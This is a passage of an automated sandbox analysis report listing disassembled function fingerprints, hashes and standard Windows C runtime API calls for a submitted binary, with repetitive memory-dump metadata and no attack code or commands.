                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Value$ErrorLast
                                                                                                      • String ID:
Similarity
• API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
• String ID: CONOUT$
Similarity
• API ID: ByteCharMultiStringWide
• String ID:
Similarity
• API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
• String ID:
Similarity
• API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
• String ID:
Similarity
• API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
• String ID:
Similarity
• API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
• String ID:
Similarity
• API ID: Is_bad_exception_allowedstd::bad_alloc::bad_alloc
• String ID: csm$csm$csm
APIs
• GetLastError.KERNEL32 ref: 00007FF6C787AD07
• FlsSetValue.KERNEL32(?,?,000078636391DE6C,00007FF6C7874BCD,?,?,?,?,00007FF6C78829BE,?,?,00000000,00007FF6C7887C0B,?,?,?), ref: 00007FF6C787AD3D
• FlsSetValue.KERNEL32(?,?,000078636391DE6C,00007FF6C7874BCD,?,?,?,?,00007FF6C78829BE,?,?,00000000,00007FF6C7887C0B,?,?,?), ref: 00007FF6C787AD6A
• FlsSetValue.KERNEL32(?,?,000078636391DE6C,00007FF6C7874BCD,?,?,?,?,00007FF6C78829BE,?,?,00000000,00007FF6C7887C0B,?,?,?), ref: 00007FF6C787AD7B
• FlsSetValue.KERNEL32(?,?,000078636391DE6C,00007FF6C7874BCD,?,?,?,?,00007FF6C78829BE,?,?,00000000,00007FF6C7887C0B,?,?,?), ref: 00007FF6C787AD8C
• SetLastError.KERNEL32 ref: 00007FF6C787ADA7
Similarity
• API ID: Value$ErrorLast
• String ID:
Similarity
• API ID: Concurrency::cancel_current_task
• String ID: false$true
                                                                                                      Similarity
                                                                                                      • API ID: std::_$Lockit$GetctypeLocinfo::_Locinfo_ctorLockit::_Lockit::~_
                                                                                                      • String ID: bad locale name
                                                                                                      • API String ID: 2967684691-1405518554
                                                                                                      • Opcode ID: 591d2bd700e3465a55b0f9c6b706778e586fa78e76f39de4335fe8b1c86bd814
                                                                                                      • Instruction ID: 8039a9988a17227295e43dff52e878cf125b39ea72819ba0175d258cf15ef7b6
                                                                                                      • Opcode Fuzzy Hash: 591d2bd700e3465a55b0f9c6b706778e586fa78e76f39de4335fe8b1c86bd814
                                                                                                      • Instruction Fuzzy Hash: 98414B22F0AB419AFB54DFB0E4902BC3B74AF44789F044434DF8EA6A99DF38D6569344
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                                                      • API String ID: 4061214504-1276376045
                                                                                                      • Opcode ID: 52527351ef27f021aaa8f573abae1b0b21d611b2d1a853a631961c83de09e1b0
                                                                                                      • Instruction ID: f3548e9776c26b80910fafd43dcf7281f991caf3e35105587e1bd2666e509aaa
                                                                                                      • Opcode Fuzzy Hash: 52527351ef27f021aaa8f573abae1b0b21d611b2d1a853a631961c83de09e1b0
                                                                                                      • Instruction Fuzzy Hash: CFF06221A1A70691EE148F64E8453796B20EF58762F544339C7EEC65E4DF2DD549C310
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AdjustPointer
                                                                                                      • String ID:
                                                                                                      • API String ID: 1740715915-0
                                                                                                      • Opcode ID: 877bf174ddecd7ac3561e44ad8c4d5f8fbcb89db0df3b071f6ae755d8025f88d
                                                                                                      • Instruction ID: 76bb677798dc4898599f1634ad58b2c4bb76ecf757072a97aab46789c142ce06
                                                                                                      • Opcode Fuzzy Hash: 877bf174ddecd7ac3561e44ad8c4d5f8fbcb89db0df3b071f6ae755d8025f88d
                                                                                                      • Instruction Fuzzy Hash: 3DB1BF22A2FA42A1EE65DF15D5446386E91BF44B82F09843ADBCDC77C9DE7CE642C301
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_task__std_exception_copy__std_exception_destroy
                                                                                                      • String ID:
                                                                                                      • API String ID: 1087005451-0
                                                                                                      • Opcode ID: 8fa2abb8088aa9f0719ea070cc18897ded193e99f4aa0bbb3f6ea83d37c04bf7
                                                                                                      • Instruction ID: 9dcd4fd3cb45f5d5bfd1bd870fc0c525b4b5c04f81c5e6526af4824f95e3bd95
                                                                                                      • Opcode Fuzzy Hash: 8fa2abb8088aa9f0719ea070cc18897ded193e99f4aa0bbb3f6ea83d37c04bf7
                                                                                                      • Instruction Fuzzy Hash: 4E81D322F1AB4295FB108FB4E4403FC3762AB547E9F504235DFAD96B96EE38A195C340
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _set_statfp
                                                                                                      • String ID:
                                                                                                      • API String ID: 1156100317-0
                                                                                                      • Opcode ID: 18f451fe96e633c4b295cbaae9d38249d0eacf18a30165643d3191e187d5effb
                                                                                                      • Instruction ID: b52e2a0b690948682e6c08504aa988dcfc6cd151b5cf0cccccc984e62af457ac
                                                                                                      • Opcode Fuzzy Hash: 18f451fe96e633c4b295cbaae9d38249d0eacf18a30165643d3191e187d5effb
                                                                                                      • Instruction Fuzzy Hash: D681D312B1AA4689F2728F36A48437A6E90BF55396F144231FBDFA65D5DF3CE483C600
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _set_statfp
                                                                                                      • String ID:
                                                                                                      • API String ID: 1156100317-0
                                                                                                      • Opcode ID: e65ba792651367d839098e214d5891407b2dde01c0b567b7a4e043ebbfca8b6f
                                                                                                      • Instruction ID: cf97d5a2108f38eca5591fa43a2e295be1ecc46c8a300bce5de7e7e28c2ed4ff
                                                                                                      • Opcode Fuzzy Hash: e65ba792651367d839098e214d5891407b2dde01c0b567b7a4e043ebbfca8b6f
                                                                                                      • Instruction Fuzzy Hash: 4111E322F8EA1301F6A45F28D55737509806F99372F1D46B6EBEFD72DACE2CB8814120
                                                                                                      APIs
                                                                                                      • FlsGetValue.KERNEL32(?,?,?,00007FF6C787471B,?,?,00000000,00007FF6C78749B6,?,?,?,?,?,00007FF6C7874942), ref: 00007FF6C787ADDF
                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF6C787471B,?,?,00000000,00007FF6C78749B6,?,?,?,?,?,00007FF6C7874942), ref: 00007FF6C787ADFE
                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF6C787471B,?,?,00000000,00007FF6C78749B6,?,?,?,?,?,00007FF6C7874942), ref: 00007FF6C787AE26
                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF6C787471B,?,?,00000000,00007FF6C78749B6,?,?,?,?,?,00007FF6C7874942), ref: 00007FF6C787AE37
                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF6C787471B,?,?,00000000,00007FF6C78749B6,?,?,?,?,?,00007FF6C7874942), ref: 00007FF6C787AE48
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Value
                                                                                                      • String ID:
                                                                                                      • API String ID: 3702945584-0
                                                                                                      • Opcode ID: d187414ded89b92ad3fb913650dc6829c15d42d8e5d1f32f0a821160ba34cb20
                                                                                                      • Instruction ID: 957593ddccfb8fa778482d3e5ea9bd26cac9bb820b0ce98c8a384fb455e9b1b8
                                                                                                      • Opcode Fuzzy Hash: d187414ded89b92ad3fb913650dc6829c15d42d8e5d1f32f0a821160ba34cb20
                                                                                                      • Instruction Fuzzy Hash: E3114F21F0F64642FA586F29A99517A5D426F44BB2F048734FBBFC6AD6DE2CB8414301
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Value
                                                                                                      • String ID:
                                                                                                      • API String ID: 3702945584-0
                                                                                                      • Opcode ID: 588ac2239229576a197fccb85acd9342fb7599446a90882bc53e90458ad91cec
                                                                                                      • Instruction ID: df7f56cc917248836cfd2a90151f0aa797236fba72524576ef14f613448758b9
                                                                                                      • Opcode Fuzzy Hash: 588ac2239229576a197fccb85acd9342fb7599446a90882bc53e90458ad91cec
                                                                                                      • Instruction Fuzzy Hash: B7113C20F0F24742F9686F2948561791D426F85B77E184734FBBFCA7D6ED6CB8404252
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                      • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                      • API String ID: 3215553584-1196891531
                                                                                                      • Opcode ID: 7c0a9480b9e258cadcf2abe377386dc5345d05869c1da105d4508b908ec5b2bf
                                                                                                      • Instruction ID: 948d2c77b09251d218d9af8ea4d9fa71f72e3f441d65aaba2e7b1f1d56cddf22
                                                                                                      • Opcode Fuzzy Hash: 7c0a9480b9e258cadcf2abe377386dc5345d05869c1da105d4508b908ec5b2bf
                                                                                                      • Instruction Fuzzy Hash: C181A032E0E20286F7658F2982583792ED19F117DAF55553FCB8EC66D9CE2DA8419301
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CallEncodePointerTranslator
                                                                                                      • String ID: MOC$RCC
                                                                                                      • API String ID: 3544855599-2084237596
                                                                                                      • Opcode ID: 9b1374c6934cf619966cd656eb24c3807a1de378a26e39886319f72bbcd0075f
                                                                                                      • Instruction ID: 217edc3f4f5f0fd013942d7a81041c55e7368a924248529cedbbfe89424bc294
                                                                                                      • Opcode Fuzzy Hash: 9b1374c6934cf619966cd656eb24c3807a1de378a26e39886319f72bbcd0075f
                                                                                                      • Instruction Fuzzy Hash: 8791AD73A297819AE710CF65E8802AD7FA1FB44B89F244139EB8D97B55DF38D291C700
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                      • String ID: csm
                                                                                                      • API String ID: 2395640692-1018135373
                                                                                                      • Opcode ID: efcaeebe434da237d7f8c65ebcc1af5689e54ad5db89f6b9947abdf816ab4442
                                                                                                      • Instruction ID: ea02dd4d886c10f5a4cd6372de33efb812d38a64671fe5fe816165ff8442579d
                                                                                                      • Opcode Fuzzy Hash: efcaeebe434da237d7f8c65ebcc1af5689e54ad5db89f6b9947abdf816ab4442
                                                                                                      • Instruction Fuzzy Hash: 4251AF32B2A6029ADB54CF15E444A783F91EB94B99F118139DB8EC7788DF7DEA41C700
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                      • String ID: csm$csm
                                                                                                      • API String ID: 3896166516-3733052814
                                                                                                      • Opcode ID: 80b5b027944e6adf200c0c0f2cdfffeff40a07b0781abe7934c39ef61a7b1e17
                                                                                                      • Instruction ID: 0bd08c92530b5691f4949f6dc9809ba22e8dd203d39d9cd81b0a1da10bdcaf54
                                                                                                      • Opcode Fuzzy Hash: 80b5b027944e6adf200c0c0f2cdfffeff40a07b0781abe7934c39ef61a7b1e17
                                                                                                      • Instruction Fuzzy Hash: 86516B329292829AEB648F15954427C7EA0FB55F9AF244139DBCDC7B85CF3CEA50C701
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CallEncodePointerTranslator
                                                                                                      • String ID: MOC$RCC
                                                                                                      • API String ID: 3544855599-2084237596
                                                                                                      • Opcode ID: 9cfd52f45ab5dc4fce2285d457194e45e3416c299f1ca1b90b44c240d660db00
                                                                                                      • Instruction ID: be4faa4ab78855e81be0a05536496f085c0de2c6c67d98f78ae4fbf041e39641
                                                                                                      • Opcode Fuzzy Hash: 9cfd52f45ab5dc4fce2285d457194e45e3416c299f1ca1b90b44c240d660db00
                                                                                                      • Instruction Fuzzy Hash: 4F61BE32919BC591DB209F15E0407AABBA0FB84B89F044235EBDD83B95DF3CD294CB01
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: std::_$Lockit$Locinfo::_Locinfo_ctorLockit::_Lockit::~_
                                                                                                      • String ID: bad locale name
                                                                                                      • API String ID: 2775327233-1405518554
                                                                                                      • Opcode ID: c0416db31ead1b90ad17fdb051eb07fe199fd48def58b7b7f5e660e329d7bcf7
                                                                                                      • Instruction ID: 33051a150ef08524dec1da75bdb36b5dfb06ecbb36bd41f2a5153dd2af2cf121
                                                                                                      • Opcode Fuzzy Hash: c0416db31ead1b90ad17fdb051eb07fe199fd48def58b7b7f5e660e329d7bcf7
                                                                                                      • Instruction Fuzzy Hash: 70418A22B1BA41A9FB54DFB0D4902EC3BA4EF54B49F040034EF9DA7A99CF38D6219345
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: std::_$Lockit$Locinfo::_Locinfo_ctorLockit::_Lockit::~_
                                                                                                      • String ID: bad locale name
                                                                                                      • API String ID: 2775327233-1405518554
                                                                                                      • Opcode ID: 9fcd7cb336c16f75f25f9420c924380d4a991d24cfce7f84e0b3057f1f7ebc5e
                                                                                                      • Instruction ID: 36a0cc02e8a56ad2c793c68617c674b7d07847978951a5d245b96ff83ead4943
                                                                                                      • Opcode Fuzzy Hash: 9fcd7cb336c16f75f25f9420c924380d4a991d24cfce7f84e0b3057f1f7ebc5e
                                                                                                      • Instruction Fuzzy Hash: A9416A22B1BA41A9EB14DFB0D4902AC3BB4EF44749F044434EF8DA7E99DF38D6269354
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: std::_$Lockit$Locinfo::_Locinfo_ctorLockit::_Lockit::~_
                                                                                                      • String ID: bad locale name
                                                                                                      • API String ID: 2775327233-1405518554
                                                                                                      • Opcode ID: 3000be0bc1095b4f4dd57d4acf3841f6710e640be6946436ed2f934302c65666
                                                                                                      • Instruction ID: eadd539760e2dd4adf503e1bfe8a96cc4a8b57e3de35623469196d79cc7b5d16
                                                                                                      • Opcode Fuzzy Hash: 3000be0bc1095b4f4dd57d4acf3841f6710e640be6946436ed2f934302c65666
                                                                                                      • Instruction Fuzzy Hash: 40415732B1AA41A9EB14DFB0D4902AC3BA4EF44B09F040035EF8DA7E99CF38D625D314
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
